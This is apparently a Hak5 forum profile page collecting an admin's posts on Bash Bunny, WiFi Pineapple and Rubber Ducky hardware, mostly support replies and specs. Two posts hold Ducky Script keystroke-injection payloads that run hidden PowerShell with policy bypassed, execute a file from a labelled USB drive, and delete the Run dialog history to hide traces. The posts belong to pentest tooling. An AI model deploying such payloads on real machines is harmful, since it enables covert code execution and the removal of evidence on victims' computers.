Jump to content

Darren Kitchen

Root Admin
  • Posts

    4,887
  • Joined

  • Days Won

    248

Everything posted by Darren Kitchen

  1. QUACK runs from payloads/ so switch2/ is relative to that. When payloads execute both switch1 and switch2 are in the $PATH. This is going to change to something a lot more obvious in the next release. Squish - I advise copying the contents of those texts into the main payload.txt and trying it from that (obviously prefixing each ducky script command with "QUACK ") -- then we'll know if that's what's causing the LED to go off early. If that's the case, we'll need to tidy that up.
  2. That's strange. I'm having no problem with either. The git you'll want is git@github.com:hak5/bashbunny-payloads.git or simply https://github.com/hak5/bashbunny-payloads
  3. I can't recall ever finding a USB port unable to provide 150-200 mA (1 watt). I'd be seriously concerned if there were any out there. 2.5 watts is most common, with modern machines providing 5-10 watts.
  4. The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows ability to recognize RNDIS as one. When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally. As for the USB disk - when the payload executes it can access the storage from /root/udisk. At the moment this gets unmounted from the Linux side when payload execution completes. So if you terminal in and ls /root/udisk you won't see anything.
  5. It really depends on what you're wanting to do. The Armory has some nice specs for a dev platform - so if you have a specific use case in mind and are keen on the programming, go for it. The Bash Bunny is a purpose built pentesting platform. We emphasize the convenience factor and really try to foster a healthy development community around the tools. It's a simple plan that's been working for us for nearly a decade as we've been making infosec tools. So - you could probably do some nifty attacks with the Armory, but there'll be more heavy lifting involved. As for the hardware differences - while Micro SD is nice for memory expansion, the fast SLC NAND memory in the Bash Bunny is one of the enabling factors for the quick boot -- which is very important for physical pentest engagements. The Bash Bunny has a 50% higher clock speed and 4x more cores. The other specs like RAM and dimensions are similar. At the end of the day it's really the software, community, and continued support you've come to know from Hak5 that makes the difference.
  6. The Bash Bunny averages 1.5A idle - 2A at load - so it works well with either the TETRA or NANO.
  7. Payloads repo is now live: https://github.com/hak5/bashbunny-payloads
  8. The Bash Bunny wiki is now live at: http://wiki.bashbunny.com/#!index.md The payload repo will be available shortly
  9. The Bash Bunny is not a USB Rubber Ducky replacement. While it's compatible with Ducky Script and supports a HID attack mode, that's only one of 5 current attack vectors. The USB Rubber Ducky will always execute payloads faster (0.1 seconds vs 7 seconds), more economically (less than half the cost), and more covertly (with its generic flash drive case). For social engineering ops, USB drops and attacks which require the target to plug in the drive, the USB Rubber Ducky is still the gold standard.
  10. I'm tidying up a few things in the repo and will be setting it to public today - so stay tuned to bashbunny.com
  11. It's the kinda hardware you're gonna wanna hop on... PS: How do you know when a joke becomes a dad joke? It's apparent.
  12. Yes, the ATTACKMODE command accepts most combinations of RNDIS_ETHERNET, ECM_ETHERNET, STORAGE, SERIAL, and HID. Pick 3 You can also change ATTACKMODE at any time in a payload, conditionally. This thing is a beast... ??
  13. I don't know about 100 Mb/s - I don't have the means to easily test that right now - but I will say I use a TETRA at home as my primary AP with a dedicated LTE modem and always-on OpenVPN connection and easily achieve 40 Mb/s throughput. The limitation is the LTE modem more than anything as taking the OpenVPN tunnel out of the equation doesn't increase speed coming from the LTE modem. See these Hak5 episodes: https://www.hak5.org/frontpage/how-to-build-an-openvpn-access-point-hak5-2017 https://www.hak5.org/frontpage/hak5-2018-how-to-build-an-openvpn-access-point-pt-2 https://www.hak5.org/episodes/season-20/hak5-2019-linux-server-build-openvpn-from-scratch https://www.hak5.org/episodes/season-21/hak5-2111-how-to-tether-without-the-fees
  14. Yes - the button replays the payload by default. My apologies for the fault. Please contact shop@hak5.org and we will attend to this matter promptly.
  15. DELAY 3000 GUI r DELAY 100 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "rp -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue; $uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\d.cmd" ENTER Executes "d.cmd" off the root of the USB drive with the label "DK" and clears Run dialog history, as seen in Hak5 episode 2112. To quickly and easily label the USB drive, select it from "My Computer" and press the F2 key.
  16. Fantastic payload 0x41414141 I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration. On Windows 10 you'll receive the following error: The screen cannot be set to the number of lines and columns specified. This is because Windows 10 has a minimum command prompt column size of 18, unlike previous versions 14. So to cover most bases, I recommend: STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" Superb payload!
  17. MrKnickerbocker - you were sent an email reply from us on Sept 2 as well as Sept 9. We have not heard back from you on either thread. Please check your spam folder for an email from shop@hak5.org.
  18. QSDx25 - While we are a very small team of 4, we strive for excellence. Most correspondence are returned within 1-2 business days. My support que is empty at the moment, so if for any reason you haven't heard back please email support@hak5.org and I'll see it right away. We unfortunately do not have the bandwidth to offer phone support. Depending on carrier, the tracking # may not update the first day. Sara is staying late answering emails now so you should have received a response if not shortly. Kerravon - The intention was not to single you out. The posts you are referencing must be from a different era as I haven't seen them. To clarify, the web interface was released as non-commercial creative commons on github. I acknowledge your good intentions and applaud you for your altruistic teaching efforts. That's a noble cause. Please reference our PMs regarding your NANO exchange. I'm happy to know it was just a return without RMA mistake. Sara should be contacting you shortly with details on the replacement. Best regards, Darren
  19. Kerravon - As I have explained to you in PM, these forums are here to support our product -- the WiFi Pineapple. At the time that the original Blue for Pineapple released, the Mark IV was a small volunteer supported endeavor using off-the-shelf equipment, and it was frequently cloned. Had we not sunk everything into the WiFi Pineapple at that time, that would have been the end of the project as we know it. Instead we went all in - and since then the WiFi Pineapple has grown into a project that supports the Hak5 team. It has enabled us to produce innovative custom hardware and provide the community with continued software updates for that hardware. It's enabled us to grow our shows, with HakTip, ThreatWire, Metasploit Minute and TekThing joining the ranks of Hak5. All of which provide the community with free education. So in short, I'm not "hell bent on keeping this quiet" -- I'm just not keen on spending resources on hosting a forum to support counterfeit devices that diminish the brand we've worked tirelessly to build. You don't need to agree with me, but you should respect my policy to support Hak5 and the half dozen people I employ who rely on this brand. Regarding your NANO support, I'm looking at the email thread with you from March 15 where I responded to your request with helpful advice and asked for clarification on a few things. I'm still waiting for a response from you to support@hak5.org. And no, Hak5 is not a "F*&%K the customers" sort of company. We stand behind our product and will do whatever it takes to make it right. We didn't get to where we are today without being customer focused. It's the same reason why we have 6 generations of the WiFi Pineapple at the same affordable price point - because unlike many in the InfoSec community we aren't into gouging. Lastly, I offer my deepest apologies that this situation has led to such an unhappy customer experience. Like I said, we stand behind our product and will do what it takes to make it right. If you please reply to the email dated March 15 I will happily continue to provide technical support and an exchange if one is needed. Best regards, Darren
  20. Hi all - Just getting back up to speed on this. From what I gather our recent back-end overhaul at wifipineapple.com has caused an issue with OTA module/infusion downloads for the Mark IV. All of these infusions still exist on our servers and I'm working towards making them available for installation by an alternate means shortly. I'll update this thread when it's available. Best regards, Darren
  21. Smarty - With the front (LED side) of the WiFi Pineapple TETRA facing you, the two antennas on the left are wlan0 and the two on the right are wlan1. Another way to put look at it is that the two wlan0 antennas are closest to the RJ45 Ethernet port while the two wlan1 antennas are closest to the Reset button. Both radios are in a diversity configuration by default and ship with dual-band antennas. Also it sounds like your power issue is related to the extra draw of the LTE modem. The upgraded PSU will fix that. You'll be receiving an email shortly if you haven't already. Cheers, Darren
  22. That's 34.5 watts capacity. You'll never draw all of that power. You could get away with any two of the above three and be fine -- but what you're doing with three is prolonging your run time.
  23. I know there's a way to do this with screen, but I'm a minicom man myself so I'll give you setup instructions for that: Connect cable from PC to TETRA USB UART port sudo apt-get install mincom sudo minicom -s Go to Serial Port setup the make sure it's set to /dev/ttyUSB0 as the device, 115200 as the speed, and 81N as in 8 data bits, 1 stop bit, no parity bit. Then save as default and either exit setup and re-issue sudo minicom without the -s, or select exit which'll drop you into the terminal. Press enter to activate -- you'll be prompted to login. If you run this while booting you'll can watch the kernel come to life. Keep this open and log what happens when there's an issue. Lemme tell you - having super convenient serial access in dev has been a boon. I highly recommend it. BTW you can do the same in Windows with PuTTY and I'm sure there's something out there for mac. I'll let the next guy school me on how screen > minicom later ;-)
×
×
  • Create New...